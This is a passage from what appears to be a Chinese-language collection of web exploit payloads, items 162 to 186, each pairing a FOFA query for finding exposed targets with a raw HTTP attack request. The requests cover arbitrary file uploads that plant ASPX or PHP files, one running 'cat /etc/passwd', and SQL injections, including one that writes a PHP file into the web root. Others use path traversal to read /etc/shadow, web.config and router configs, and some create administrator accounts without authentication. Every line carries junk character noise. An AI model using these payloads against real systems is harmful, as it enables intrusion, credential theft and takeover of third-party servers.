2 i8 }. s5 n$ o</soap:Envelope>: P- f# W/ v7 j$ J6 H2 G6 w
) m! r0 A2 Y+ ^% ?! a- c
% o& n; J6 h/ g6 f% d2 bhttp://x.x.x.x/dizxdell.aspx
8 `7 w8 `4 s- b3 G6 _) `
1 y; ~% H1 ]+ w- i; Z. C6 p$ q9 [162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传9 @+ I' @! M* O6 ?, F4 ?" {/ _
FOFA: app="和丰山海-数字标牌"
( y& c7 H0 C* M9 V# v: |POST /QH.aspx HTTP/1.1/ m3 e! q1 R- d+ o. H( n7 [
Host: x.x.x.x! x+ v8 n0 I" U8 ^& ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, r: u! Q" o) n/ B. O$ lConnection: close
5 y. ~3 w3 Y# j2 ~. U1 ^0 YContent-Length: 583
* T2 N# _5 g- V9 M- D/ f7 u# |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
: p& y) N1 N( u! s0 o, QAccept-Encoding: gzip
b9 X. c0 `2 D6 J# I
! K* z- _1 a. }! a- I, d* d------WebKitFormBoundaryeegvclmyurlotuey
2 O1 l/ F$ L7 e6 E' }- C$ IContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx") w6 k: h" y. j. v& t- e" [/ o
Content-Type: application/octet-stream
. \+ r1 Z- `# O2 ^ |4 Q5 [6 M/ n* `
<% response.write("ujidwqfuuqjalgkvrpqy") %>9 M* P/ j, Z' x
------WebKitFormBoundaryeegvclmyurlotuey
7 m3 ~2 d% M% Y) j8 yContent-Disposition: form-data; name="action"
( C' s+ t3 g8 [% {/ V) p0 n* P4 W6 o$ E# I
upload1 n8 d' o2 V" D6 E+ [
------WebKitFormBoundaryeegvclmyurlotuey% s- h) s, d% S
Content-Disposition: form-data; name="responderId"
* U" f$ S' S; E1 d' Z. v8 s" i% r6 ?! |) r. L! { j
ResourceNewResponder0 G5 n* E2 y& j; z1 M+ ?
------WebKitFormBoundaryeegvclmyurlotuey
4 s# ^0 g1 {/ m9 UContent-Disposition: form-data; name="remotePath"5 g1 A' }2 L) f D
7 E( G: J* @6 F5 [ Y/opt/resources
6 y" |9 b/ B' g6 i$ i0 ^------WebKitFormBoundaryeegvclmyurlotuey--
; D# ~6 z! h6 v/ Y- t7 }% S* M9 \* a3 P4 [. S% d4 z* d+ s
6 I' F. n# o! J& v9 I3 g- J, w+ n$ g
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
4 D% T! b" O& _8 z1 v- X
# } h; |0 m \; z6 r163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# P3 V3 ?# m$ M. e7 A3 d) o- gFOFA: icon_hash="-795291075"
- Q- J: f- b' \5 Z3 D4 RPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1! I8 G. b7 Q; U! H& X/ X$ i5 U4 R
Host: x.x.x.x( O' E" w8 z" z5 B5 R' H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
$ v8 ]' q( H* x# D( o$ g' TConnection: close
; j* W5 j6 N# ~ AContent-Length: 293! {% x$ w% |7 Y
Accept: */*. U: f$ c4 Q3 S; k) q( z
Accept-Encoding: gzip, deflate4 V$ B$ G. s' {7 i& p: L" Y+ D$ Y
Accept-Language: zh-CN,zh;q=0.9
+ \4 ]' ^/ o+ b* j# UContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 H: O9 a$ l$ }2 k' h7 o4 @/ B; c$ k1 X/ _" {7 {1 Y
------iiqvnofupvhdyrcoqyuujyetjvqgocod j: Q* [3 N" O4 s9 ]( `, y( n
Content-Disposition: form-data; name="name"3 H6 v4 @! f. O8 n& `/ ^
0 i+ l6 p4 m9 R4 T4 q; B4 m5 o+ G
1.php
! e* w4 }7 x3 f- z/ Z. X; S------iiqvnofupvhdyrcoqyuujyetjvqgocod
; c& O6 O9 @% I& [( g RContent-Disposition: form-data; name="upfile"; filename="1.php"9 b) t8 G. F7 s3 {# S; V
Content-Type: image/jpeg
; j2 O0 X8 M$ m6 r2 y; H' W$ g- E) R
rvjhvbhwwuooyiioxega8 M+ a6 m# q' J i r$ g' i3 l
------iiqvnofupvhdyrcoqyuujyetjvqgocod--) Q* N6 U; A# M4 y8 v& q; k1 E
" ~5 z B8 Y4 ^* t
3 M. f4 o' [# S9 P7 j164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
: j7 {" L7 x( UFOFA: title="智慧综合管理平台登入"
2 j9 I% C) Q1 L$ z& d ^POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1* n) e) j, ~% F$ p& K" x! s
Host: x.x.x.x
( v# {! g; S( ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
8 x8 U$ J+ b6 \: L, F) ] BContent-Length: 2887 V" ~+ s) \$ u! D# E8 c, A; O* j5 `
Accept: application/json, text/javascript, */*; q=0.01
2 F& Y* f- F5 \( YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
0 O& h9 w# H' e* G) `Connection: close- _) F5 p3 Z( s: ^- y2 X
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl7 j1 P' j8 M. {4 K
X-Requested-With: XMLHttpRequest. h9 Z+ V- P5 ^2 n8 O7 E$ E
Accept-Encoding: gzip
# j0 X- W0 \) @1 L% @9 W `- U# K X; l3 C9 K' g
------dqdaieopnozbkapjacdbdthlvtlyl
% \8 l- {$ [2 [8 ~5 a" x% fContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"' \! R" K: d" n
Content-Type: image/jpeg
9 Y0 L% F' F0 h1 c/ a( j7 c- t! e' x" P; C4 c# j5 G
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>+ G+ Q( T* y0 Z! U# P" Q& f
------dqdaieopnozbkapjacdbdthlvtlyl--
: h% `+ t5 w3 L4 j# B! j
; j- l# }1 C9 K0 P: z* O$ f
; p+ X; E6 x5 U0 Lhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx3 s0 O4 `( e' Q/ X; O9 a- C
* y# I2 P7 W: R: \: a
165. OrangeHRM 3.3.3 SQL 注入
) M6 S1 g/ d% W/ f' I7 LCVE-2024-364281 d% _0 w$ v0 O4 p' |( b+ b% y* e
FOFA: app="OrangeHRM-产品"% W9 z1 a& |7 N# |, p, J2 O
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
+ w& i$ w7 k% h: H5 l* H' Y+ u
7 J. `8 ]9 F P1 s4 f! y7 F% A. r9 L5 V6 t% K9 u
166. 中成科信票务管理平台SeatMapHandler SQL注入
6 g) d- f0 z0 pFOFA:body="技术支持:北京中成科信科技发展有限公司"
8 k& q7 H" \/ {0 x2 |POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
; w: _- u" ^6 s3 C. z! M5 _, t2 ^Host:
; d* I+ i# W' F# F, E7 n# PPragma: no-cache
9 H" a. k& V/ [2 S' J# bCache-Control: no-cache
4 ^3 P% \! [& t( h" H" e6 WUpgrade-Insecure-Requests: 1. O0 q$ F+ z4 T9 k0 n2 e% d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# ^" \! h; q) x7 p( Z" lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( I" K( E5 g4 t4 i: M! b# xAccept-Encoding: gzip, deflate
! X3 Q% M0 b( zAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 M7 I0 `7 z" D7 i% _+ gCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE+ {/ d" E) e( o2 p
Connection: close
U6 J8 `( `! a" n2 X2 D- OContent-Type: application/x-www-form-urlencoded
7 z/ D, G% g2 |( f. B6 QContent-Length: 89
9 H# ~& e* @; I, l; C
8 N! `5 u5 j% AMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE* Q! r; M Q6 l* m1 p
' f0 P; G# \" c/ h M
' _5 y4 `' N$ q0 o& A# p" C# c7 b
167. 精益价值管理系统 DownLoad.aspx任意文件读取
# u3 O7 y/ h' G m) I6 H* ?2 Z: l. oFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
F1 S. b$ R4 \& O( V6 _GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1. N/ v A3 ]0 P
Host:
: z9 G- t' L6 w O9 x6 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( J# F7 {/ O& X4 {2 K1 A- ~
Content-Type: application/x-www-form-urlencoded" R% H ~) N% o& F6 x
Accept-Encoding: gzip, deflate d, M) [- Z2 L' C& F3 V0 ~
Accept: */*
1 l0 p; f5 P; m1 H1 h# }Connection: keep-alive
6 P" Y- R6 R/ E) G% z2 K5 B8 \4 Z9 s
" M. R. b/ ?& E& p* Z. q
168. 宏景EHR OutputCode 任意文件读取
8 o2 A) ?5 K+ x# \, v( K) RFOFA:app="HJSOFT-HCM"
( x7 f B G1 @! j5 Z9 iGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1$ Y- Z3 b. V6 a, @% d( x* F
Host: your-ip: A6 _' _* ~/ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.361 t8 l* {# u1 I( l- S" ~
Content-Type: application/x-www-form-urlencoded
) K" j# ^' W, [& R% T( DConnection: close0 s1 `8 m+ S8 K5 X5 F Q) u
! A* B# l& B, k8 c7 w& w o* _: f7 h! I8 G* M! c
' [& u2 O$ c u, x E
169. 宏景EHR downlawbase SQL注入
) y- q0 T" @8 w& ~8 Z, hFOFA:app="HJSOFT-HCM"; W5 k- N4 s1 O% C/ @0 I3 [, P
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.12 o0 F" D* c! C* q) s0 R) A0 g3 j
Host: your-ip
0 ~, P8 ]5 q& c( \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, j4 ]& M$ }$ P O+ z9 U1 [Accept: */*
) `# L' H/ I) H" r0 K, j& OAccept-Encoding: gzip, deflate- X. Y' C2 f0 Z) ?/ [) p5 t
Connection: close
9 q7 m& t. H( N( w; F9 Z9 s$ L9 B) E8 K5 j8 K5 r; R
: W# d% L @+ J Y: h
6 U% q! ?3 F0 w0 o170. 宏景EHR DisplayExcelCustomReport 任意文件读取
& V8 c' O6 y& e4 TFOFA:body="/general/sys/hjaxmanage.js"3 [1 E) o9 `0 L- j' F! g+ Q
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
( C2 E: N' x' K; u& s8 H; a) HHost: balalanengliang
- q7 B% a+ l3 fUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" i1 ]+ m$ M0 N& ?5 c! Q5 h2 v" yContent-Type: application/x-www-form-urlencoded
. y( Y" @+ W/ O
7 y8 O* m# W# {5 J/ L# I1 gfilename=../webapps/ROOT/WEB-INF/web.xml- R. E! }: w9 w4 @% {1 }
) F' N. S0 q# |+ W% h6 C
8 H! ?6 h2 P, J2 T* E171. 通天星CMSV6车载定位监控平台 SQL注入( k2 R( S+ h8 C8 g6 A/ D
FOFA:body="/808gps/"
+ X( ^5 m+ S- Y6 A+ q* U; ]+ OGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1, J* s+ s& A* {
Host: your-ip
G( l0 q9 r" k4 X, SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
9 o1 O5 o7 ]2 ^% _Accept: */*
- [+ |0 f; a" o& H. NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 {. _2 [# _+ a5 J; d9 G$ k @- \
Accept-Encoding: gzip, deflate2 C1 q4 G% o0 M8 k
Connection: close
" d- q2 `" ]' J+ n# L* |& m/ r, I( G3 t2 @$ r; q
6 ]! R8 x E% v. b
, Z8 d; @) p% N# |% U1 v- i! R
172. DT-高清车牌识别摄像机任意文件读取
; a. Q5 h2 p) l$ @; ]0 }7 v% gFOFA:app="DT-高清车牌识别摄像机"6 k. b, V- d3 F; G
GET /../../../../etc/passwd HTTP/1.1
4 p, L( s: {: V& s: b% _/ mHost: your-ip
/ T/ \+ t6 z% F: t/ e4 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 [* y* a" z. d! O
Accept-Encoding: gzip, deflate
6 x: J j9 v) }Accept: */*' X! d, m" Q1 V4 A \- O7 k% n& v
Connection: keep-alive
' |+ m3 F8 G: c% t( Y8 X8 F7 k6 F! k! D
A1 L# J- _& T" v0 K& u
4 M: K* t- v5 Q173. Check Point 安全网关任意文件读取- k9 `; c3 d- u6 {2 i& X4 q
CVE-2024-24919
" ~6 t' f. @6 X v, CFOFA:app="Check_Point-SSL-Network-Extender"* Z: \, [6 p# N: H0 ?
POST /clients/MyCRL HTTP/1.1
& J G1 P, ~* @3 Q1 p8 A/ z0 GHost: your-ip( h# \+ {' M% L* {1 C
Content-Type: application/x-www-form-urlencoded2 d' r% O2 y- M. v+ [5 X" n e# E
% i- L. l6 [4 D( A& {- P1 n0 }aCSHELL/../../../../../../../etc/shadow
9 B2 s# f0 R" e9 l) o1 I- C! V! F$ V* x1 @- I" K- _
& z7 t7 S% T# } B& |
# @$ i: a3 J8 O- j' w174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ A# x8 F6 g$ {0 N( \3 L# R: M2 K
FOFA:app="金和网络-金和OA"
+ W* q% ~1 Z: V, \: OGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
9 w( |+ ` r& z' r3 v' ^+ OHost: your-ip
2 B5 ]4 U/ [# |$ p* P# Y3 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" `& w7 G0 V0 ]. a1 M/ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- [ ] m9 }8 m- W5 b8 l6 _3 kAccept-Encoding: gzip, deflate, br
! s0 s$ I2 N% L, Q) Y& tAccept-Language: zh-CN,zh;q=0.9
! y8 n2 q; v5 ^& YConnection: close1 @. }$ ?0 _3 C4 l4 |" d
3 a% z' i9 L" u- V
5 k5 R9 C9 {1 P( X# m* j$ J. `5 m% r! w! O( D
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入6 c: _) X4 y( x6 w2 k# ^, P/ m
FOFA:app="金和网络-金和OA"# I# y4 f% }) v9 g8 h
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.18 W, y2 K6 {9 B5 c! _
Host:
( [" T, D1 k n$ j. ^; I, q# aUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 @$ a) o4 P- y ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Y# C/ s6 N _1 i9 x. `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( |2 _* S) N: |4 C% H
Accept-Encoding: gzip, deflate" w1 P4 \6 a& Q) v: l
Connection: close
0 V8 ^7 p7 k* H6 l1 yUpgrade-Insecure-Requests: 1
* h0 Y+ s) A! P# E: ~# X8 }% v7 ?6 R6 p7 K
& U" l- u' v4 d& D9 O" d176. 电信网关配置管理系统 rewrite.php 文件上传1 s! i: P3 c' n/ z+ p$ \% P
FOFA:body="img/login_bg3.png" && body="系统登录"9 z4 G/ D6 k" D- T5 V9 B z/ U
POST /manager/teletext/material/rewrite.php HTTP/1.14 B8 N$ x3 {- d# `/ m
Host: your-ip) B3 O+ J3 k/ o& R' ^5 U2 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) c: T1 s* |9 }& B- IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
; @, g# E2 y3 c1 PConnection: close7 X. j' K4 p9 i* z# o
1 L. I5 {+ v1 N1 X9 i------WebKitFormBoundaryOKldnDPT! T9 h9 F0 N8 i
Content-Disposition: form-data; name="tmp_name"; filename="test.php"/ w8 s2 W2 g6 [% |) B+ n0 i1 u) R7 f
Content-Type: image/png
- R9 J* O/ \5 `4 g
: A+ O g* J, J# e" f) D( Y<?php system("cat /etc/passwd");unlink(__FILE__);?>
^* @6 r" ~# h0 m" m. A- t: r------WebKitFormBoundaryOKldnDPT4 d1 l! w8 ]# `# d3 S
Content-Disposition: form-data; name="uploadtime"9 _. e' v; z0 Y$ `: n* ?# J
( L* K" m. A. ]* }8 V
- o$ [- U; ^6 F/ l: U; ~& B------WebKitFormBoundaryOKldnDPT--# J& j S( j6 O/ N0 z/ _2 |
n* K! t. @! }; g( D, p
4 t& q: R. Q& K" U3 e& D1 { g
$ v) f; `8 r- P6 u177. H3C路由器敏感信息泄露
7 i$ a! ]( i, W/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 y3 ^9 i. Z; }$ [2 C; h
/userLogin.asp/../actionpolicy_status/../M60.cfg" T/ J# d$ L. y
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
+ Q& J8 K# b$ e. C7 p' G; r/userLogin.asp/../actionpolicy_status/../GR5200.cfg
3 t1 e3 n# H+ \9 E/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 H0 m) T, ~# c: {# B/userLogin.asp/../actionpolicy_status/../GR2200.cfg) }, }9 ?( T% }, e8 S7 N) Y
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg3 \2 i0 P( ]/ x; Y
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
5 e/ [( u# F2 R' w/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg( V# u0 D X4 `7 f& Y
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
7 @% [7 J. K/ z/userLogin.asp/../actionpolicy_status/../ER5200.cfg
# ^8 {: T* O7 r: r" m/userLogin.asp/../actionpolicy_status/../ER5100.cfg
+ y. g$ X! i( k. ~& E/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
" m+ O# i T$ m9 g* }/userLogin.asp/../actionpolicy_status/../ER3260.cfg
" d$ _1 Y: k \& l- f/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
0 q6 W- m% u5 \/userLogin.asp/../actionpolicy_status/../ER3200.cfg$ x4 ]- Q5 `. O; H/ S
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg) A9 b9 D7 J+ S0 k" t
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
" \7 i% m. w. ?) D. X/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg# {" o- i9 h5 |5 S# ~
/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 y$ P- ?/ ?) ~4 M0 v( b2 V
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
% ?' |* r" E; P8 a' @. ?( s* H$ U1 { N7 v
" g# e4 ~3 g s/ l! m178. H3C校园网自助服务系统-flexfileupload-任意文件上传' |8 S$ h4 n# o& k
FOFA:header="/selfservice"
9 F k6 F8 {( I' W* T- g/ QPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
5 d' {- y, Z @6 `: g& OHost:
* A' d# D) @ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" h! ~' Z2 `& r } O0 ]
Content-Length: 2523 H# \" x! W/ h
Accept-Encoding: gzip, deflate
$ z) |) s1 l) [Connection: close
! j: C: E X6 N2 PContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
5 M4 W, s; @4 F4 L2 |2 E-----------------aqutkea7vvanpqy3rh2l' Z, m9 G% o0 [7 ?, s
Content-Disposition: form-data; name="12234.txt"; filename="12234"
. x0 O3 P$ z l9 O* x# HContent-Type: application/octet-stream2 D$ Q: H( c) M, I
Content-Length: 255
5 H$ ~# Z# @4 q
/ j1 m* C6 C3 ~7 @/ l12234
* B. Z a* V) A8 T7 ^-----------------aqutkea7vvanpqy3rh2l--
; ?; Y ?5 z- P+ g4 [. b4 v
* [9 J" W3 c/ x, W" p( e
9 C' g3 c( _( i7 O" x: Q' @GET /imc/primepush/%2e%2e/flex/12234.txt
1 C" S- `; F/ Y1 l' Z
1 p" G3 _. P2 F1 m: T% _( ?
$ f# Q- L% U5 G9 `8 z4 Z3 A& s179. 建文工程管理系统存在任意文件读取/ l! O7 ~* w/ x4 b
POST /Common/DownLoad2.aspx HTTP/1.1
5 U$ f2 n* g5 y# \8 @& C( K$ EHost: {{Hostname}}
: u6 s+ X+ Y1 A+ Y2 wContent-Type: application/x-www-form-urlencoded/ ?/ j0 L/ R: U" P
User-Agent: Mozilla/5.07 B( O" {, B0 j7 P3 c4 t8 I
2 \ K- m8 l# G& xpath=../log4net.config&Name=4 A/ u& Y6 l1 Y8 J) J
2 j0 \, B1 S. E
$ N2 l, L8 _+ M7 V- \180. 帮管客 CRM jiliyu SQL注入* G' E4 C# f6 x7 u
FOFA:app="帮管客-CRM"
7 J0 l5 p- l, O+ }% ~GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1: F. n1 Y- ]1 C$ {1 x3 G
Host: your-ip
, g7 n2 @# ^) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 o+ s- O, r) AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 y2 v! J4 h$ k% j7 f2 t/ _/ F9 y. s
Accept-Encoding: gzip, deflate
2 t; ~! i6 w1 u( `/ LAccept-Language: zh-CN,zh;q=0.99 h: [9 z1 |* u( o6 R
Connection: close# V2 S3 F* Q' Z( X g8 {) d
. l/ e, s3 ?$ h. f+ ` V
/ o& X/ B$ ?" a& `181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ F! t. z8 i: H# _
FOFA:"PDCA/js/_publicCom.js"
! O' w: G, x. W+ PPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.18 y; k* o& e v5 v2 m+ }( N8 h L
Host: your-ip
5 D; T& x1 H7 Y# |) \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! M7 |, {% `/ F6 J, rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* m5 n% w7 j4 l+ c; U2 q( _# \Accept-Encoding: gzip, deflate, br
$ V. e) p2 K& s5 }# M1 J& ]$ n6 TAccept-Language: zh-CN,zh;q=0.9 ]: |9 F1 G9 D! p
Connection: close _0 i7 n, K0 ^" I; m# m
Content-Type: application/x-www-form-urlencoded
1 X) B( h4 d# h/ \" ?6 P6 j2 o7 Y, v2 u
- ^0 X+ y* `* L) x
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
$ o, Y, } c6 r4 h& [5 Q
& K* L. `5 ^; B V$ H; ^: F9 z' ~" t0 N! ^
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, w' U/ g$ L1 N1 I3 \4 WFOFA:"PDCA/js/_publicCom.js"2 Y+ V8 `2 \/ ]: M& x# N. i9 _5 u
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
8 o2 Q: u" X4 S( ], BHost: your-ip
7 D' @9 O3 V* _; Z! F/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.362 c" c2 f2 } X' M- [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; N3 U J- y. ~4 F
Accept-Encoding: gzip, deflate, br
. s8 }7 k2 ?7 O- U5 b$ J+ E3 ?Accept-Language: zh-CN,zh;q=0.9' J7 p H9 V3 `* ]. p& D$ Z
Connection: close3 a1 }2 k1 [5 }+ e* c7 U4 k
Content-Type: application/x-www-form-urlencoded: J0 u; A' L0 z8 y5 }5 \& a; s" d! q
3 ~0 W' Z: E$ ~5 A% Y/ Z
# u. H3 C4 B) y4 P( ^. @. Iusername=test1234&pwd=test1234&savedays=1
9 w L1 T' G5 G$ K; Y5 a0 {0 x8 E4 Z% r; o
0 q4 q! Q5 B( C) `: _183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 r# K8 q3 p, C, d3 M# V% i
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"# s/ F; e. m" Z( Q: S5 v
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1; N& t' r Q% c, @. N; t
Host: your-ip
: z7 W% X7 h0 M3 [5 y7 PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
# m! a% p% d Q# c- \Accept-Charset: utf-87 x/ g' ?6 u/ L+ U: O9 H
Accept-Encoding: gzip, deflate
; n3 u7 z* M# B" XConnection: close
. X: i; ^* }: y. E# Q" G# |+ j0 M. T! k7 I" o/ e
7 [( x- D* [. P* L" _1 ]) r* [; S1 k/ ^
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* \5 f* W0 [( f, i! i7 J- [$ lFOFA:server="SunFull-Webs"+ m `3 g; e3 |8 X; |. a( S
POST /soap/AddUser HTTP/1.1+ w0 C( o4 @2 Z
Host: your-ip
6 u' W( g- x3 }2 y" b! |& s8 E( s% CAccept-Encoding: gzip, deflate; w7 q" ?. N! k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; ^4 [# _: V2 V0 L
Accept: application/xml, text/xml, */*; q=0.01
( k$ C8 H+ }2 T( {Content-Type: text/xml; charset=utf-8$ Q) p) Z% e0 y( }$ G; B1 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: ]+ ]3 b: \; a+ B7 aX-Requested-With: XMLHttpRequest
$ E# Y; g# }! h. O7 P0 w& C$ l( o
3 `/ x; b% ^+ m2 {" P# ?( m7 o' Qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')6 y+ @9 X8 I2 F: K$ Z8 C
4 k0 k7 O2 u" r0 \9 H1 v; `/ `5 r( ^6 }
185. 瑞友天翼应用虚拟化系统SQL注入& g S: k( b3 v- e
version < 7.0.5.1
: r; K7 O6 d6 UFOFA:app="REALOR-天翼应用虚拟化系统"
' I' F- z0 A6 A8 E7 wGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
3 g6 B+ T7 E2 IHost: host
# f, M) K. X! f2 K' C( M% j
0 c. m( p+ y' \3 |- R" V- w9 e
8 W9 G- L3 B- S, J/ M- V7 Q# m186. F-logic DataCube3 SQL注入
